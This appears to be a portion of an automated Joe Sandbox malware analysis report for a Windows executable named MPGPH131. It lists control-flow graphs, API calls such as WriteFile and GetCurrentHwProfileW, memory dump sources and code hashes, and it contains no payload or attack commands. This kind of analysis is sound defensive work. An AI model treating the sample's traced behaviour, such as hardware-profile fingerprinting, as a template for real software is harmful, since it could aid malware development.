                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a3a7be43b2b0dbf91ddf805ed8d7945e5722bdbbb36c4e537c045ef1b937f71
                                  • Instruction ID: ce2872535896564733247383b0585b669be3ed501a203cdfe5c62267cb5c27c9
                                  • Opcode Fuzzy Hash: 3a3a7be43b2b0dbf91ddf805ed8d7945e5722bdbbb36c4e537c045ef1b937f71
                                  • Instruction Fuzzy Hash: 93B1D470A04249AFDB11DFA8D881BEEBBF5EF46304F9441D8E544A72C1CB709D81CB60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 169 a2a210-a2a2ab call aff290 call a22ae0 174 a2a2b0-a2a2bb 169->174 174->174 175 a2a2bd-a2a2c8 174->175 176 a2a2ca 175->176 177 a2a2cd-a2a2de call b05362 175->177 176->177 180 a2a2e0-a2a305 call b09136 call b04eeb call b09136 177->180 181 a2a351-a2a357 177->181 199 a2a307 180->199 200 a2a30c-a2a316 180->200 183 a2a381-a2a393 181->183 184 a2a359-a2a365 181->184 186 a2a377-a2a37e call aff511 184->186 187 a2a367-a2a375 184->187 186->183 187->186 189 a2a394-a2a3ae call b047b0 187->189 196 a2a3b0-a2a3bb 189->196 196->196 198 a2a3bd-a2a3c8 196->198 201 a2a3ca 198->201 202 a2a3cd-a2a3df call b05362 198->202 199->200 203 a2a328-a2a32f call a8cf60 200->203 204 a2a318-a2a31c 200->204 201->202 213 a2a3e1-a2a3f9 call b09136 call b04eeb call b08be8 202->213 214 a2a3fc-a2a403 202->214 209 a2a334-a2a33a 203->209 207 a2a320-a2a326 204->207 208 a2a31e 204->208 207->209 208->207 211 a2a33e-a2a349 call b0dbdf call b08be8 209->211 212 a2a33c 209->212 229 a2a34e 211->229 212->211 213->214 215 a2a405-a2a411 214->215 216 a2a42d-a2a433 214->216 219 a2a423-a2a42a call aff511 215->219 220 a2a413-a2a421 215->220 219->216 220->219 223 a2a434-a2a45e call b047b0 220->223 236 a2a460-a2a464 223->236 237 a2a46f-a2a474 223->237 229->181 236->237 238 a2a466-a2a46e 236->238
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 8c367c3aec955d43041cd823d5b158986750c373b038dda574dc07a3e579d3f3
                                  • Instruction ID: 8b0d85372e3af6bd12631feafcb8f4d598f3a0689ec83bab6a8976c0fea5a663
                                  • Opcode Fuzzy Hash: 8c367c3aec955d43041cd823d5b158986750c373b038dda574dc07a3e579d3f3
                                  • Instruction Fuzzy Hash: B1712671900214AFDB14DF6CEC49BAEBBE9EF41700F1085ADF8099B682D7B5DA41C792

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 239 b1549c-b154be 240 b156b1 239->240 241 b154c4-b154c6 239->241 244 b156b3-b156b7 240->244 242 b154f2-b15515 241->242 243 b154c8-b154e7 call b04723 241->243 246 b15517-b15519 242->246 247 b1551b-b15521 242->247 250 b154ea-b154ed 243->250 246->247 249 b15523-b15534 246->249 247->243 247->249 251 b15547-b15557 call b14fe1 249->251 252 b15536-b15544 call b0e17d 249->252 250->244 257 b155a0-b155b2 251->257 258 b15559-b1555f 251->258 252->251 261 b155b4-b155ba 257->261 262 b15609-b15629 WriteFile 257->262 259 b15561-b15564 258->259 260 b15588-b1559e call b14bb2 258->260 263 b15566-b15569 259->263 264 b1556f-b1557e call b14f79 259->264 280 b15581-b15583 260->280 268 b155f5-b15607 call b1505e 261->268 269 b155bc-b155bf 261->269 266 b15634 262->266 267 b1562b-b15631 262->267 263->264 270 b15649-b1564c 263->270 264->280 274 b15637-b15642 266->274 267->266 289 b155dc-b155df 268->289 275 b155e1-b155f3 call b15222 269->275 276 b155c1-b155c4 269->276 285 b1564f-b15651 270->285 282 b15644-b15647 274->282 283 b156ac-b156af 274->283 275->289 284 b155ca-b155d7 call b15139 276->284 276->285 280->274 282->270 283->244 284->289 286 b15653-b15658 285->286 287 b1567f-b1568b 285->287 291 b15671-b1567a call b0d208 286->291 292 b1565a-b1566c 286->292 293 b15695-b156a7 287->293 294 b1568d-b15693 287->294 289->280 291->250 292->250 293->250 294->240 294->293
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000000,00B09087,?,00000000,00000000,00000000,?,00000000,?,00A2A3EB,00B09087,00000000,00A2A3EB,?,?), ref: 00B15621
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: da6acde741f8a8484e167aee40d846217b08631e56b0226c89a0fe74747ab89d
                                  • Instruction ID: 24a406ae77e5b302c8ab0f9f10a3e84b6d6ecf640b9d2ab997e04310baef010a
                                  • Opcode Fuzzy Hash: da6acde741f8a8484e167aee40d846217b08631e56b0226c89a0fe74747ab89d
                                  • Instruction Fuzzy Hash: 6261B071900509EFDF21DFA8C884EEEBBFAEF99304F9401C5E804A7245D771DA918BA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 b04942-b0494f 298 b04951-b04974 call b04723 297->298 299 b04979-b0498d call b15f82 297->299 304 b04ae0-b04ae2 298->304 305 b04992-b0499b call b0e11f 299->305 306 b0498f 299->306 308 b049a0-b049af 305->308 306->305 309 b049b1 308->309 310 b049bf-b049c8 308->310 311 b049b7-b049b9 309->311 312 b04a89-b04a8e 309->312 313 b049ca-b049d7 310->313 314 b049dc-b04a10 310->314 311->310 311->312 315 b04ade-b04adf 312->315 316 b04adc 313->316 317 b04a12-b04a1c 314->317 318 b04a6d-b04a79 314->318 315->304 316->315 319 b04a43-b04a4f 317->319 320 b04a1e-b04a2a 317->320 321 b04a90-b04a93 318->321 322 b04a7b-b04a82 318->322 319->321 325 b04a51-b04a6b call b04e59 319->325 320->319 324 b04a2c-b04a3e call b04cae 320->324 323 b04a96-b04a9e 321->323 322->312 326 b04aa0-b04aa6 323->326 327 b04ada 323->327 324->315 325->323 330 b04aa8-b04abc call b04ae3 326->330 331 b04abe-b04ac2 326->331 327->316 330->315 335 b04ac4-b04ad2 call b24a10 331->335 336 b04ad5-b04ad7 331->336 335->336 336->327
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a66a76805cb1cdfe67d827dc33810e92775d23ac94a8e1b1f0d9303fe48d9589
                                  • Instruction ID: d95b735c852b77f9497c557fc0eaa37f114cc707a5c9b2b13344ef91c7e86b56
                                  • Opcode Fuzzy Hash: a66a76805cb1cdfe67d827dc33810e92775d23ac94a8e1b1f0d9303fe48d9589
                                  • Instruction Fuzzy Hash: D551A7B0B00208AFDF14CF58CC85AAA7FF5EF45354F248198F9499B292D3719E41CB94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 340 a90560-a9057f 341 a906a9 call a22270 340->341 342 a90585-a90598 340->342 346 a906ae call a221d0 341->346 343 a9059a 342->343 344 a905c0-a905c8 342->344 349 a9059c-a905a1 343->349 347 a905ca-a905cf 344->347 348 a905d1-a905d5 344->348 354 a906b3-a906b8 call b047b0 346->354 347->349 351 a905d9-a905e1 348->351 352 a905d7 348->352 353 a905a4-a905a5 call aff290 349->353 355 a905f0-a905f2 351->355 356 a905e3-a905e8 351->356 352->351 358 a905aa-a905af 353->358 361 a90601 355->361 362 a905f4-a905ff call aff290 355->362 356->346 360 a905ee 356->360 358->354 363 a905b5-a905be 358->363 360->353 366 a90603-a90629 361->366 362->366 363->366 368 a9062b-a90655 call b00f70 call b014f0 366->368 369 a90680-a906a6 call b00f70 call b014f0 366->369 378 a90669-a9067d call aff511 368->378 379 a90657-a90665 368->379 379->354 380 a90667 379->380 380->378
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A906AE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction ID: 3ced867fdc23f4da8080688d01e28476eb7b291a2c70bcccc270a4040337e8a7
                                  • Opcode Fuzzy Hash: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction Fuzzy Hash: AF410372A001189FCF15EF68DD80AAE7BE5AF89380F1541A9F905EB342D770DD209BE1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 383 5060867-50608cf call 50608d6 388 5060901-506090b 383->388 389 50608d1 383->389 390 506090d-5060913 GetCurrentHwProfileW 388->390 389->388 391 506091f-506092d call 5060930 390->391 394 506092f 391->394 395 506097b-50609b8 call 50609bf 391->395 400 50609ba 395->400 400->400
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153102222.0000000005060000.00000040.00001000.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5060000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 8c431aa237d64640cb53e7b646a43edb03c208b8ca2f5e786ca1d8e58a02a472
                                  • Instruction ID: 2738256f240cfe555ca84fc9b7e7e30785feac3eef398a1d8b963ee39d67b888
                                  • Opcode Fuzzy Hash: 8c431aa237d64640cb53e7b646a43edb03c208b8ca2f5e786ca1d8e58a02a472
                                  • Instruction Fuzzy Hash: F70126EB1881052C7103D1912F38AFF676EEAD37307308476F403C3142E6D08A4D5071

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 401 b14b12-b14b26 call b1a6de 404 b14b28-b14b2a 401->404 405 b14b2c-b14b34 401->405 406 b14b7a-b14b9a call b1a64d 404->406 407 b14b36-b14b3d 405->407 408 b14b3f-b14b42 405->408 417 b14bac 406->417 418 b14b9c-b14baa call b0d208 406->418 407->408 410 b14b4a-b14b5e call b1a6de * 2 407->410 411 b14b60-b14b70 call b1a6de FindCloseChangeNotification 408->411 412 b14b44-b14b48 408->412 410->404 410->411 411->404 421 b14b72-b14b78 411->421 412->410 412->411 423 b14bae-b14bb1 417->423 418->423 421->406
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00B149F9,00000000,CF830579,00B51140,0000000C,00B14AB5,00B08BBD,?), ref: 00B14B68
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: b89a2c85ee3b509bf563dea5eef1b201c068cc0ce0c46ec2efb8a0eec7d4b995
                                  • Instruction ID: 24deaddaea6b20bba5a8679aef05b7cc6840326170e3144e66fc00ce07559b57
                                  • Opcode Fuzzy Hash: b89a2c85ee3b509bf563dea5eef1b201c068cc0ce0c46ec2efb8a0eec7d4b995
                                  • Instruction Fuzzy Hash: D7110432A492241AD6242674AC41BFF77D9CB827B4FB902C9F8589B1C2EF61FCC25195

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 427 50608d6-506090a 430 506090d-5060913 GetCurrentHwProfileW 427->430 431 506091f-506092d call 5060930 430->431 434 506092f 431->434 435 506097b-50609b8 call 50609bf 431->435 440 50609ba 435->440 440->440
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(0000A483), ref: 0506090E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153102222.0000000005060000.00000040.00001000.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5060000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 39e7e4c65018134b7fb22dce3eba7563fed263b92f5e7859f3290547a2146c44
                                  • Instruction ID: 393cdf92a1d06dafd6c4432b9d7b04732213e8918da186b3f41a4fba6360eda3
                                  • Opcode Fuzzy Hash: 39e7e4c65018134b7fb22dce3eba7563fed263b92f5e7859f3290547a2146c44
                                  • Instruction Fuzzy Hash: 1EF059F728C112AC7212C6157B389FF239FE6C673033045B3F806C7105D2940E4A2132

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 441 b0e05c-b0e074 call b1a6de 444 b0e076-b0e07d 441->444 445 b0e08a-b0e0a0 SetFilePointerEx 441->445 446 b0e084-b0e088 444->446 447 b0e0a2-b0e0b3 call b0d208 445->447 448 b0e0b5-b0e0bf 445->448 449 b0e0db-b0e0de 446->449 447->446 448->446 450 b0e0c1-b0e0d6 448->450 450->449
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00B50DF8,00A2A3EB,00000002,00A2A3EB,00000000,?,?,?,00B0E166,00000000,?,00A2A3EB,00000002,00B50DF8), ref: 00B0E098
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: ed1835bb24364ab8f0312d1a1e6d6877c2f465c97bc90e8af911758e60c58406
                                  • Instruction ID: af9d95baeb797c7841522102fa61e20144a7253b4df892d0587314d883330971
                                  • Opcode Fuzzy Hash: ed1835bb24364ab8f0312d1a1e6d6877c2f465c97bc90e8af911758e60c58406
                                  • Instruction Fuzzy Hash: 4101D632610259AFCF159F59DC46C9E3FAADB81324B240688F8609B2D1FAB1ED51DBD0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 454 aff290-aff293 455 aff2a2-aff2a5 call b0df2c 454->455 457 aff2aa-aff2ad 455->457 458 aff2af-aff2b0 457->458 459 aff295-aff2a0 call b117d8 457->459 459->455 462 aff2b1-aff2b5 459->462 463 a221d0-a22220 call a221b0 call b00efb call b00651 462->463 464 aff2bb 462->464 464->464
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A2220E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 5cafe8bfb2d3bcea12107c62a93f18105c9add137713c81c5c2a060ea11ac3a3
                                  • Instruction ID: 79f8b9c1d30464d9308d5327f2deb359ddcdac209f3203315d5acd858aebf106
                                  • Opcode Fuzzy Hash: 5cafe8bfb2d3bcea12107c62a93f18105c9add137713c81c5c2a060ea11ac3a3
                                  • Instruction Fuzzy Hash: A301DB7650030DBBCB14AFD8E801AA97BECDE00310F508575FB1CDB691E770E9548791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 471 506096d-506096e 472 5060970-506099d 471->472 473 506090d-5060913 GetCurrentHwProfileW 471->473 476 50609ae-50609b8 call 50609bf 472->476 475 506091f-506092d call 5060930 473->475 481 506092f 475->481 482 506097b-506099d 475->482 484 50609ba 476->484 482->476 484->484
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(0000A483), ref: 0506090E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153102222.0000000005060000.00000040.00001000.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5060000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 36c42164c4b443a664800f4258b9a0752c41f52ac4035676593e1a5e5d627743
                                  • Instruction ID: 63f9a80cf3a668dc6a01f891f13e8ab2acec5e956b2e68863c17d898206ee1d5
                                  • Opcode Fuzzy Hash: 36c42164c4b443a664800f4258b9a0752c41f52ac4035676593e1a5e5d627743
                                  • Instruction Fuzzy Hash: A4F082F73881126CB652D6197F38AFF139EF6C573073186A7F806C6145E2594D8A5132

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 485 b163f3-b163fe 486 b16400-b1640a 485->486 487 b1640c-b16412 485->487 486->487 488 b16440-b1644b call b0d23f 486->488 489 b16414-b16415 487->489 490 b1642b-b1643c RtlAllocateHeap 487->490 494 b1644d-b1644f 488->494 489->490 491 b16417-b1641e call b13f93 490->491 492 b1643e 490->492 491->488 498 b16420-b16429 call b117d8 491->498 492->494 498->488 498->490
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00B091F7,00000000,?,00B15D79,00000001,00000364,00000000,00000006,000000FF,?,00000000,00B0D244,00B089C3,00B091F7,00000000), ref: 00B16434
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
